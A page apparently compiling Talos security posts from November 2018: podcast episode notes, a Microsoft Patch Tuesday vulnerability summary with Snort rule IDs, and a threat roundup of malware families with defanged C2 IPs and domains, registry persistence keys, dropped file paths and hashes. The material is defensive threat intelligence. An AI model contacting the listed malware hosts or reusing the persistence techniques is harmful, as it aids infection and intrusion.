Beers with Talos (BWT) Podcast Ep. #41 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #41 show notes: Recorded Nov. 9, 2018 — We tried to make this episode last week, but thanks to some technical difficulties, we ended up calling that one a practice run. Here is take two, focused on recent sextortion scams and the pending machine learning apocalypse. We also review why vulnerability discovery and red teams are the most import line items in your security budget by looking a recent story where a breach cost dozens of lives.
The timeline:The topics00:38 — Roundtable: We are now trivia-worthy
12:25 — Persian Stalker and on down the mobile rabbit hole
22:45 — The anatomy of sextortion scams
31:32 — Machine learning and the malware wars
45:20 — Vulnerability discovery: Why our 200-vuln milestone is both important and amazing
52:32 —Save the red team, CIA covert comms cover blown
1:02:49 — Closing thoughts and parting shots
The links==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
[email protected]

Microsoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coverage

Tue, 13/11/2018 - 16:53
Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities, 11 of which are rated "critical," 40 that are rated "important” and one “moderate” and “low” vulnerability, each.

The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.

This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance for how users should configure BitLocker in order to properly enforce software encryption.

For more on our coverage for these vulnerabilities, check out the SNORTⓇ blog post here.

Critical vulnerabilitiesMicrosoft disclosed 11 critical vulnerabilities this month, which we will highlight below. There is also a critical advisory covering Adobe Flash Player.

CVE-2018-8541, CVE-2018-8542, CVE-2018-8543, CVE-2018-8551, CVE-2018-8555, CVE-2018-8556, CVE-2018-8557 and CVE-2018-8588 are all memory corruption vulnerabilities in the Chakra scripting engine. They all lie in the way that the scripting engine handles objects in memory in the Microsoft Edge internet browser. These vulnerabilities could corrupt memory in a way that an attacker could execute code in the context of the current user. An attacker needs to convince a user to open a specially crafted, malicious website on Microsoft Edge in order to exploit these bugs.

CVE-2018-8476 is a remote code execution vulnerability in the Windows Deployment Services TFTP server. The bug lies in the way the TFTP server handles objects in memory. An attacker could exploit this vulnerability by supplying the user with a specially crafted request.

CVE-2018-8553 is a remote code execution vulnerability in Microsoft Graphics Components that lies in the way Graphics Components handles objects in memory. An attacker can exploit this vulnerability by providing the user with a specially crafted file.

CVE-2018-8544 is a remote code execution vulnerability that exists in the way that the VBScript engine handles objects in memory. An attacker needs to trick a user into visiting a specially crafted website on Internet Explorer in order to exploit this vulnerability. Alternatively, the attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts Internet Explorer’s rendering engine.

ADV180025 addresses several vulnerabilities in Adobe Flash Player, which are outlined by Adobe in a separate release. Microsoft recommends updating to the latest version of Flash Player, as well as disabling Flash on its web browsers.

Important vulnerabilitiesThere are also 40 important vulnerabilities in this release. We would like to specifically highlight seven of them.

CVE-2018-8256 is a remote code execution vulnerability in PowerShell when it improperly handles specially crafted files. An attacker could execute malicious code on a vulnerable system. This update fixes the vulnerability by ensuring that PowerShell properly handles files.

CVE-2018-8574 and CVE-2018-8577 are remote code execution vulnerabilities in Microsoft Excel that occurs when the software fails to properly handle objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted Excel file, either as an email attachment or another method.

CVE-2018-8582 is a remote code execution vulnerability in Microsoft Outlook when the software fails to properly parse specially modified rule export files. Users who have their settings configured to allow fewer user rights are less impacted by this vulnerability than those who operate with administrative user rights. Workstations and terminal servers that use Microsoft Outlook are also at risk. An attacker needs to convince a user to open a specially crafted rule export file in an email in order to trigger this bug.

CVE-2018-8450 is a remote code execution vulnerability that exists when Windows Search handles objects in memory. An attacker could trigger this vulnerability by sending a specially crafted function to the Windows Search service, or via an SMB connection.

CVE-2018-8550 is an elevation of privilege in Windows COM Aggregate Marshaler. An attacker who successfully exploits the vulnerability could run arbitrary code with elevated privileges. The vulnerability does not directly allow the user to execute arbitrary code, but it could be used in conjunction with other bugs to execute code with elevated privileges.

CVE-2018-8570 is a remote code execution vulnerability in Internet Explorer that exists when the web browser improperly accesses objects in memory. An attacker could exploit this bug by hosting a malicious website on Internet Explorer and then convincing the user to visit the link.

The other important vulnerabilities are:
Moderate vulnerabilitiesThe one moderate vulnerability is CVE-2018-8546, a denial-of-service vulnerability in the Skype video messaging service.

Low vulnerabilityThere is also one low-rated vulnerability, CVE-2018-8416, which is a tampering vulnerability in the .NET Core.

CoverageIn response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on

Snort rules: 32637, 45142, 45143, 48399 - 48404, 48374 - 48388, 48393 - 48395, 48360 - 48373, 48408 - 48410

Threat Roundup for November 2 to November 9

Fri, 09/11/2018 - 14:50

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 02 and Nov. 09. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Doc.Malware.00536d-6741783-0
    Doc.Malware.00536d-6741783-0 is a family of malicious documents that leverage obfuscated VBA and PowerShell scripts to download malicious binaries from the internet and infect the system. These documents use WMI techniques to launch the downloaded binaries and can deliver different types of payloads.
  • Win.Malware.Nymaim-6742391-0
    Win.Malware.Nymaim-6742391-0 is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
  • Doc.Malware.00536d-6741218-0
    Doc.Malware.00536d-6741218-0 is the denomination of a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.
  • Win.Trojan.Gamarue-6739927-0
    Win.Trojan.Gamarue-6739927-0 covers a family that, after installing itself on the system to survive after reboot, will spread itself to USB drives and modify system configuration settings to weaken its security and disable certain features, such as the task manager or the Windows shell, in order to protect itself. It can exfiltrate sensitive data and receive additional commands.
  • Win.Malware.Mikey-6739644-0
    Win.Malware.Mikey-6739644 is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. These types of threats can also receive additional commands and perform other malicious actions on the system such as installing additional malware upon request.
  • Win.Worm.Brontok-6739140-0
    Win.Worm.Brontok is an email worm that can copy itself onto USB drives. It can change system configuration to weaken its security settings, conduct distributed denial-of-service attacks, and perform other malicious actions on the infected systems.
  • Win.Trojan.Autoruner-6733593-0
    Autorunner is in the Esfury family. Esfury is a type of worm that commonly spreads via removable drives or platforms with user interaction (e.g. emails, instant messages, web pages). When executed, Esfury modifies multiple registry keys in order to execute when certain Windows applications are opened, including security products, registry editor and task manager. Esfury may also contact a remote server to download and execute arbitrary files.
  • Doc.Downloader.Emotet-6744157-1
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.
Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 92[.]242[.]63[.]202
Domain Names contacted by malware. Does not indicate maliciousness
  • nosenessel[.]com
Files and or directories created
  • %AppData%\Microsoft\Word\STARTUP
  • %AppData%\Microsoft\Office\Recent\349314338.doc.LNK
  • %LocalAppData%\Temp\icn3tzqs.qav.psm1
  • %LocalAppData%\Temp\lgisqtyq.v2z.ps1
  • %AppData%\1bb228b0.exe
File Hashes
  • 1e0bd69fa2c12403b9077c42ebe1bd4d997cdd3d8f1160e7fcab0e52b2965a51
  • 24b727b94bc1ef9b3d99ae6cfb0333db51321ce3646a78a20f59f2accf2b4207
  • 39a3e2237ac464b2eac90dfd103fb9829cd6dabf425c72c1043678a47161ef08
  • 5c534ae4e830cf73ddc02a19368138b60bfe0cd8ab12d1bb89106872fb735539
  • 6ac5f9318f1a4db50373f4763edd01aa85aa3e6d8637149b52deb23478acb358
  • 6cc51b903fd07d87102d0d6eb7d6614b75921a5c1210993f67d0fe21effb45a8
  • 74df3318eac202ebbe0aea03d0fa5bdfc5fcd4feeb7ffc972fbce8e69f5597e5
  • 7f96371e446f1b9ddba9fddfcc8cf0f07beb26de8a2b1783414f0cf5f4c50530
  • 893b067586eb6d303aae26addf02f5bf4bfa2bd677cd0a96b1ebc20b05c3cf38
  • 90cb72a9707af427f9dc874a44f26511ef7d9c82606783aff4d609e15f2bb441
  • 97e01b5a1cf7a4e79c383ae6fbd1314466f75c9c03c5c663193b05ec8eee4fd9
  • a5795dac579590b099f9fb41037aa8febf3b0423d64990f496a2c3698f874f04
  • ae5bdac5fd5fbd09c0cdf2940291bef19ffacc0324a5ffaa56976934fea34c6e
  • aeeaca88ec0fb0e4a6fbbf07824712100522a73c0607f416e377ad4c87045a3c
  • b85de0b45a9634af9cf3a4026af2d5e743457dc9b284c89c704b0794b2565fd2
  • bfdd22f0ff5728885bbd364316e74f544a7fcbcd487f3948aaece5ba0aae1e42
  • c971f20312204409ac651ecb7b1a3eb50034f0362e4e96fc86be2d4c4afe9c84
  • d12832f6d0c374bd6525a7ad1458f3e8808bb8fb3e1c73cdd3e23d94bf219aaf
  • d236416e4940fdbee40f8e8457ab28ba9fca779147c92475222d9d92f26923d7
  • d4b688389477443d6e8ce9963e08cea45208e54a44a43fd2eedce6a4c0d183d3
  • dc2fcd6b057c26db0218ae05928653bba568a1486490aa4d052efb5c9c80617d
  • f14c41e682010bb6ebf436d83b2e97f7f31e07aff46850e055511b49cb851f36
  • f272476efe9202bba15dbb7cf7c13ef3918391f7743fa4267d220cd103ce05a3

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\fro.dfx
  • %SystemDrive%\Documents and Settings\All Users\pxs\pil.ohu
File Hashes
  • 079c12699c6dbd13e486a4c7db333ec114420da38acde8afe4d62219c62afd82
  • 1e12e3edeb209993fd7d5623fb10f342dca54e101ea8593348d8cc9e72e91384
  • 303f8d6644e52783c8d4ebdef5d4e720803e828529eef24607806cb6041d1adc
  • 31605081f5b8b138ff011fa6e796e6d2352160ad4a97ba07de4fbb38dd1cb41c
  • 5056a547e092c82e74a2da61a5a90eb2a7e7e551e39a3387753917bedf8c3130
  • 57e97b8dbfe3e8831b9b7bbcaef974e7d8c9422a15560453b0fde22b0fe3dc94
  • 86bd123441e1b1ed3f37938b58dbc572b844e7ba8e59506ccd41fd0d9d950628
  • 87c04d2500b70ebf0865d5ac5889f13bdc86d0a137dd1a20094a3308b52ac191
  • 899752fd8fbe560e658be72bf03a3a774b6dcb9d2d14e25da862d7edce5d9fbf
  • 8afc084c965d1c0091b61744c7cc5bd9cf5cb48195a6b04096dfe80ca118fd26
  • 91e2920a163dec32f3edd8ff50a8b545fb192ad3d75c2ee96db6ac9b01f373dd
  • a20d48b79e72d3fc229929af39560ac26504fd31d20a7b29b81a4624eda6a0b9
  • a98b56d5bd9e67da1d1052cc044af7f45cc0a6472093799466d48e6f841016db
  • ae038c14c8eb49ecd135bb667bc3f96dc38e40e6df58d8475f2298b0a5a3c69c
  • cd9fa3f18f1108d2c1fefd8f978c167de8139c66c28638bfbc799c3b7b1cfd5a
  • e694c1f807a97327fbbed467fed853c289e014d368dffacde9b8b62c2f68595f
  • ee133570f883ea59f5ddd1f71ed9c6d09b0d7291c639d33d7991fa3af9956f84
  • f359d51daf2f35ce8f2f7a0bd82b29db843caf8089cf9eff9b6d95fb503fa071
  • f751ceca4b32c1af8e890a727aa2c65c63015798b380518af8255722cdbaca5f
  • fc1edb4659342e728ad83ac651f7d0d34532ad1f184796a1bed495072655af56
  • ff3a4f6aa65acbdd0c82c80041809e019802e4f700f0b2a5748bbc40b45889be

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 92[.]242[.]63[.]202
  • 95[.]181[.]198[.]72
Domain Names contacted by malware. Does not indicate maliciousness
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • suggenesse[.]com
  • legicalpan[.]com
  • gulamicros[.]com
Files and or directories created
  • %LocalAppData%\Temp\5jootfr4.adu.ps1
  • %LocalAppData%\Temp\e2dn4nhu.cmdline
  • %LocalAppData%\Temp\uju0ohji.0.cs
  • %LocalAppData%\Temp\uju0ohji.cmdline
  • %LocalAppData%\Temp\uju0ohji.dll
  • %LocalAppData%\Temp\e2dn4nhu.dll
File Hashes
  • 2f6d9e97206c5bf4937e0d6670d164594415a8941b0ef1b1bb1e4ae0e582e816
  • 43b28f32e670fce395b4dbbc12998dac81c171f6ff8fb841be4fce90fbe741d9
  • 57b720358b65e7d57cb0d8abad9b4706271c23a14ae36cbfde7b89d23ecafa23
  • 5eabc1946ae11fe7e59e9f7ea9160b2ec7060890bb8fabdf732617bd2c2c0d47
  • 7dde66dbf159d5c9663b2ed51e834b69e47c43191a12702e0e3a5507426ad070
  • a77242cb419e6f7fa611d48ffee9e7ea181458c0969d120926610966b11a6335
  • ba9a8a1a4e15c6d94763e15a8f51f67b30a6c663ad5c610191d516db518bb139
  • e51d13605afc35735e4f46844c93780c9879608050fe909c81951e9ca08a28d3
  • e7b86602d4f64895cdacff52c443f64639aeb506b04f695775569c10b1633d3d
  • f89c4ecce06bf20400d5110573e84935af0e93149de5a0fde45dc7a9f0b1f9e4

Screenshots of DetectionAMP




Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\
    • Value Name: CustomPropertyHwIdKey
    • Value Name: CustomPropertyHwIdKey
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \Autorun.inf
  • %LocalAppData%\Temp\wmsetup.log
  • \??\E:\Autorun.inf
  • %LocalAppData%\Temp\NoPorn.exe
  • %LocalAppData%\Temp\mplayerc.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\NoPorn.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\mplayerc.exe
File Hashes
  • 06c823cc443447348137467a2951dd2d34b4ffdcde178e6d1700394ef5e2793f
  • 0defd1806fbfbddfd772df482ca562d31e1a01ee9a5d4a5a964d6729bc6051e5
  • 2da83ddb169023cb60622ef6e297b65dce69151c803fd29d53468b5ec2c6dedf
  • 2f90ed051dc82a7d8bc389debf88284495f96f56a51e36c1a4a1e41634c28fcc
  • 3e3decd6f11025d59dbb0c0457b9e5e0353a063d53d5725a3a94836819613a1c
  • 42fd138ce68919a322202dea37bdafffefca7cf9bb91eb47591c0b6957126478
  • 44e49ebd375b57146ad486e37db18e7809d01d51c0ed55e8d8afe9c43d3a5485
  • 478ea2c130bd95ecf1763952f2f644a8b175184284f9713cc35abe0c6f6f848e
  • 4d60b0ae61b9ef56997be59f7c896f2a60e81e28d267cbcec52a75140e05aa16
  • 59751557033163959f841a10157e94f1c9fa8e5366a910644f1966a125ad9b35
  • 5ff49224ceb338b6b35b7303c68ff3df9f87099ffcec50970627a06e938f510a
  • 6b82c968572a2ab008cb8bca2816d3f7cca491c059aee6b1e7a693b10580e073
  • 84b9a43ff01d4b6be671749b56dcf724c0c4553153dfa336730f36b42fac6969
  • 884ae2b467d21f8dbf65bce26b08a6659d75004b22f1af5d7ed8e4198c2688ae
  • 89653d4159192e8df7843942f543e4a3dbf00e89dc3f957af38778202159ec85
  • 9b082ca14ca1f7f7244f1a6b93062c01a8c336bf3ef6cab707a2aada4214178b
  • bb3f180271e5b2f30e1bdb9e80c75539dc8fb06870cccf571f77cf123297d432
  • cd80fcca97cb88cb92da3d5fb396b24e102001d3efc06082e6e3dfded9f8ee0a
  • dbcf9f6802b6ab0d218e47c44113e589ecf753dc7701e695bd67e9fe057fbabc
  • dfb4bd0bdf964886571dc6dad423d5a6894683b59f6620fa2d426b8a81cad311
  • f1ac70e09fc2deabe8184133b0955841be63928bd5f07df647ba89e795701e07
  • f4b168493c04afd24a7d93d620122da9483804215f86f68cae2c532a2a5883a9
  • fd24deac9cf57d3de7884e3766ad3cc982090fed9068e0b4a02d68cbdb5b9369
  • fdd6cf898a92f3343b73400f330ee522ee8d6b947802138c7c17c6c0db82bbe1

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    • Value Name: CachePrefix
    • Value Name: CachePrefix
    • Value Name: CachePrefix
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • statsrichwork[.]com
Files and or directories created
  • files\information.txt
  • files\passwords.txt
File Hashes
  • 19e073fb9fb7811440e873ae60578b28c06b0aec9e21d730f8205c81b7ababf5
  • 201872934f7f6674af89597d1a819f79cf843578aa9928191561ebdb637a53cd
  • 243e098e78e1ff111354e231fac6b01e69f473cb10c27f2485a568316c0395df
  • 2b52ef895983a4778aaa66dd90cc8bb296ca3b96b891c087c4fcf483d5bf48c6
  • 3c66d120d27778c2a1110170ad85eed2313fcc5cf55345cdbdc283ada76a86c1
  • 42228a6bafdf985fc02536b17990299589d967ad44d22dbefdb2dbc44681741b
  • 48437e0f2c8bc5f0d3f46fec63ce26b3b66dc65610e3c97b4fa8a1b643c8e2f1
  • 4a2364a4b3e8ad43b505a616486ef537159c8b8df9fe140977c9ab6aa1bad658
  • 4f80b59c35090b1dbdf94f73770c222352555e7112bec28efb189e3b340b4c2c
  • 633bcbf980d9299324b3b0baefe80954f06e41a6f71267bfc83c8950a8932696
  • 6705cf85955113629d95a7206deb524f82ed5a3fe04666d98423b944c3ce2156
  • 6f74c88c2c04eb117c26d5283d83ac4735928bb50f76b2104be36f8101466aa3
  • 70a7d3ac821670090237f52308fb6b1ca47e032d3de9267584f59abe247e536a
  • 711c1db67575b1a795a4aeb439ada79ab8a7cc98f2c68cb0e2beacafa5d044de
  • 8f815fbcf18c1bc554756233e3fa7d326645a30809042b068ac03daef649c307
  • 911ce750a17ac1e43d53087630b1e3af416619aff2d086b89b6def0d0bfa927d
  • 95aa51bc0016bf055d53f1d663b560c97d15d19956787aecf8af7933e6765e5b
  • a3347f536bef48b877e49fce133e86b864ef657137ab73db60b62436e2aca7b2
  • bb99c43836000b751e3fa1deda851b646f02be036ad9d86a09adb7963bec7b69
  • d3edf8ca17f1b41fa96ea9b4377d5778a7965345230425730940444469ce57fb
  • da37e831e94b3f7226688cf7f201ef4c032d393ee25bd2437d826a21e08c03b4
  • dedb1d0c69521f7c47abc2e6fa925642269fd40a00ea21270b7b950cb101f7be
  • f3dd18c0de2af39bfd1dc3498de48e31668f6fdeb89065dcc9e7a81ae6c5046e
  • f980768d4d68e75b6d83cff0c80ec153a80bf700f7df3bd53fe9f06bdafda01b
  • f99b50470431b2f91b80f3acccbf179441aa24bc702d3f2ba08f4f9f2357d6c8

Screenshots of DetectionAMP



Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\
  • <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\winlogon\
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\autorun.inf
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\cute.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\imoet.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\lsass.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\smss.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\WINDOWS\winlogon.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\smss.exe
  • %SystemDrive%\Data_Rahasia Administrator.exe
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Application Data\winlogon.exe
  • %SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\Empty.pif
  • %System32%\IExplorer.exe
  • %System32%\shell.exe
  • %SystemDrive%\Tiwi_Cute.exe
  • %System32%\tiwi.scr
  • %WinDir%\tiwi.exe
  • %SystemDrive%\present.txt
  • %SystemDrive%\tiwi.exe
File Hashes
  • 005aeac3a2685665e22aac6270c7effc4718c92737ace9f6215c1f3e93adf632
  • 007cfb6540762317643054786cb91843f5f713f879ca20d2abcb63a02ab9c87f
  • 010b717c887c1f7d8a0f08d73b01f37b6d7a871e2f17ea9dc60a1bcd379b0f8b
  • 036e59256be20eeed60c1dc49f2182089bd22bbe5aef75bbfe234f9898571d96
  • 03d0d49484f05ff4461d8bcb40c42c38f72cea2c5b673e93f1329dfecb3824dd
  • 043f25f1981421906c255dd5379e878ec4c5a359c9492abd3880eaa3176a4578
  • 052f01970798eb34c728da985358f05ba47134e84c381c96cea52f7274e74d31
  • 05dbbe0b660825cd4f2453b1afcd483ee3523771bc22a743e913f5e867fa063a
  • 064e0bbb5470221d65b575e930c7b615af574f4f8395d573afbaa034ae4ffc6b
  • 06569b13aa7a18eea8a863c768fe47468e505a898a9b689c376ab3cb3f957b80
  • 0676fd79294f4ca277380e44085176012b97e5e07ab652009ce85791294a6f95
  • 068f0a2d6b99b2701ae41325851a6fa258059c535765c2eb9ba30fd94118b995
  • 0721857c17edb718c984d002fd24e754672e3d2eccaef2dcbc78f7ce0a902eac
  • 0830ddb3dd73dbdbe524db466a035a85ba2e1eff6de24738d7ab42acd4ce4da1
  • 08fabe5f7aabaa4e2f8a432f9e8287c7c80073dc05dc4fc9e8590f1bf15c25c4
  • 09600f1b158f792909a105e155bde59e24f6e46322a13b7109649d15c97689da
  • 0b70dbba443121a8aed5e4adb630737a773622ef16415034f5e1ef7af9a18d28
  • 0b7a26dd115453a5530b387338b18d05d826e5ac3174399567f03376e2e67335
  • 0c902a3a4a2a36d64351861dc4d8c2ad74a1415aff9b5f71ffc3e740a691483f
  • 0cb7d5f688faf979b0d53200b507c0ab49446e2fc798635dca699ca6bfc2cf53
  • 0dc9618e5edc34a8ada892b5c5a403eb9e64eb8e51772d35f4ee79959bccb686
  • 0e8a750df320de2ee02b70b9c27b77d835ffe4c0c57b0ec6aca73e2df78f39e3
  • 0ed1e47a487b750d9fa86743fe7d8a285292bf68169d61a0097570dffae443a9
  • 0ee895125c27f3def3a2a60a2c16b9a66e0c2752337e621ce3cf0a2d70372aeb
  • 0ff2198fa27c38bfbbaeb1e56f28696ceed254b749ee3b44d1163d41ebac534b

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
    • Value Name: Debugger
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 204[.]79[.]197[.]200
  • 91[.]195[.]240[.]94
  • 72[.]21[.]81[.]200
  • 23[.]79[.]219[.]185
  • 67[.]202[.]94[.]93
  • 50[.]23[.]131[.]235
  • 23[.]3[.]96[.]25
Domain Names contacted by malware. Does not indicate maliciousness
  • kz0t0g6xn457m449312vx962m32v69[.]ipcheker[.]com
  • 17d98a5d[.]akstat[.]io
  • r0u603u61y8999y[.]directorio-w[.]com
  • 4o91sy32347o7x636pk2084dk0p66z[.]ipgreat[.]com
  • 8s8908905t67uc0a75zm35c78xq0ex[.]ipcheker[.]com
  • 7r3u5sm670kplbt6w1036p7ployl36[.]ipcheker[.]com
Files and or directories created
  • \??\E:\autorun.inf
  • %UserProfile%\27F6471627473796E696D64614\winlogon.exe
File Hashes
  • 00de9aefee7e84028781e5d88e23c7ac53d8a10aa97116411d43b6532112fa16
  • 01474c0dacb671b37172b985d8e96bb688f2e4f6f8975a6bdab76c3ebb6ca29a
  • 0206ba28fd335c6470736f976885f5916375e114ce442208f30aaca55525d41c
  • 027b08647ec8a4976897114dcac6810acb215dc13805edd0986d4bce04528f59
  • 02e94f61d5c4da2b4a3b8991278a77e937da0de55b2f5373f804344cae73dad8
  • 033c6325a22ddee4d621558106fd297407f31e0713c7c2314024e8cbcdc0a5b3
  • 05d0ef6586355e9255a5723ae5909602de6def71e64f3e1838211bb0d3c9de81
  • 06bdc32de83eec39c9153b7944b8abc0137e3b69c80ac02e74d6903c656915e7
  • 06e53af6c4bde93f7a9da0b90408e59b701d1ced02c5fb14fba45c7272452367
  • 082831142fe7826130b5d5ac7673d9ae8f7f56e126348283e77fc3c88f4d5b0b
  • 08617dcb9523e28efed1e47917b6f9dc6dfb534c6d0d7df0888e977099f4db71
  • 09a8a4d6b7e8d68dcbf7279923f5d8322e4d46dea86ca1da0f553bdb1f5fc222
  • 09c40f54a73303ddf1d6170f3cd06778583260e82b7dfe155a2f804346aadfc9
  • 0b032c40e0877bd1c4aeca8bf56b87d0daacc781ad2cb025cdc7c3944074e816
  • 0b979d82d329160c7f95cb8abc9ccc8e0ebb4f981ee321342e84a29ff33687f9
  • 0be8709e38625829811638c2460a8eaa993569df882f4a7263747f91bd08970a
  • 0e47b656aa6dfdc797ff650a7d1800639f7347d2af4fd0ae6520e02ff0cec9a0
  • 0eeb8d4cb796e8460ea5c283deed8788356822e6a7916c9cec496dc7cf4f3ab2
  • 101217714340fcd5d1194ac746d2b4c9d42f739f12b983ce33801d2baebb71ab
  • 11e0b16cfcd0e45c21a1fbe9b7b14bf019f3e2ceb7894eee8e458eb6a7571c34
  • 12e12efef70cc7824ea45771c844393d1e1b878a86def41acc01093249bc7e19
  • 1374cf423bc66983991c7fd3e3767aedf67094cf5a3eff6eb695112b51dc5e6a
  • 13910ca1a7fbadf757c082dde5d1724b6b46d36b9eae47d1bd968c66a67be3ba
  • 17ea3123406cb0ef21c174f4f27a89d4cbd5b61ff1359ec9b8c756b311ee0f4d
  • 183b07b0a5e93388d391deeac811b405d0cf46c66f3817efe535780a6d06c10a

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
    • Value Name: Type
    • Value Name: Start
    • Value Name: ErrorControl
    • Value Name: ImagePath
    • Value Name: DisplayName
    • Value Name: WOW64
    • Value Name: ObjectName
    • Value Name: Description
  • Global\I98B68E3C
  • Global\M98B68E3C
IP Addresses contacted by malware. Does not indicate maliciousness
  • 182[.]180[.]77[.]215
  • 45[.]59[.]204[.]133
  • 67[.]177[.]71[.]77
  • 87[.]229[.]45[.]35
Domain Names contacted by malware. Does not indicate maliciousness
  • lionhomesystem[.]hu
Files and or directories created
  • %AppData%\Microsoft\UProof\CUSTOM.DIC
  • %SystemDrive%\TEMP\~$18_11Informationen_betreffend_Transaktion.doc
  • %SystemDrive%\~$9441806.doc
  • %LocalAppData%\Temp\781.exe
  • %LocalAppData%\Temp\mq0dgaud.vrd.psm1
  • %LocalAppData%\Temp\xxlgesic.vav.ps1
  • %WinDir%\SysWOW64\dimcloudb.exe
  • %WinDir%\TEMP\9E64.tmp
  • %LocalAppData%\Temp\CVRF911.tmp
File Hashes
  • 14e4a394fa5994ce2ff8047f2bac46b385a5a6510205e4c65930c0af413c935e
  • 500a319207a744b8d20c4bccb1c0b5b4f2fafc228cf05dd6bd2cb19b02444f58
  • 53402a103a73ae604657be6e171cc017957fa1f3638fcbe976ca3af694ba0b7f
  • 6bc0481d7b339a55f6493bfba40bca7819a3799a39b5beaf09490aafed45bc24
  • 82448e012786f528fb7946640e84c6beadf34de21130a69bdc1538d4cc8cddf2
  • 8d74c083778f9511c01916d183301686ac09a7011bbfa8f744a5816dc244340a
  • 94de7534a45275daa06e0189c6bd06ca41176b3da93303b5fae677ae92cbb92d
